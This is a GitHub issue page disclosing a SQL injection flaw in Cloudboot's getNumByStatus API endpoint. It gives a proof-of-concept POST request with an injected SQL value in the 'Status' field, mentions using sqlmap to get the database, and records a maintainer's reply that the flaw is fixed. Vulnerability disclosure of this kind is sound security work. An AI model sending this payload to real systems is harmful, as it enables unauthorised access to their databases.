Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cloudboot has SQL injection #22

Open
allen909 opened this issue Sep 5, 2019 · 2 comments
Open

Cloudboot has SQL injection #22

allen909 opened this issue Sep 5, 2019 · 2 comments
Labels

Comments

@allen909
Copy link

allen909 commented Sep 5, 2019

A sql injection was discovered in cloudboot
There is a sql injection vulnerability which allows remote attackers to inject sql command of /api/osinstall/v1/device/getNumByStatus

PoC:
POST /api/osinstall/v1/device/getNumByStatus HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

{"Status":"1'order by 2#","UserID":0}

"Status" is the injection point

Use sqlmap to get the database
image

@xibolun xibolun added the bug label Jul 27, 2020
@xibolun
Copy link

xibolun commented Jul 27, 2020

yes it is. already fixed at enterprise version.

@attritionorg
Copy link

@kedadiannao220 Could you link to a fixing commit please?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

3 participants